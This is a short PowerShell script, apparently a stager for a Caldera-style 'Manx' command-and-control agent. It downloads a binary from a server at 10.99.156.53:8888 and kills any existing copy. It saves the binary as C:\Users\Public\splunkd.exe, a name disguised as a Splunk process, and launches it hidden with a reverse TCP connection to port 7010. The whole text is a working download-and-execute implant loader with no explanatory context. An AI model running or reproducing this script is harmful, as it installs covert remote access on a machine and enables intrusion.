if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};
$server="http://10.99.156.53:8888";
$socket="10.99.156.53:7010";
$contact="tcp";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","manx.go");
$data=$wc.DownloadData($url);
Get-Process | ? {$_.Path -like "C:\Users\Public\splunkd.exe"} | stop-process -f -ea $ErrAction;
rm -force "C:\Users\Public\splunkd.exe" -ea $ErrAction;
([io.file]::WriteAllBytes("C:\Users\Public\splunkd.exe",$data)) | Out-Null;
Start-Process -FilePath C:\Users\Public\splunkd.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;
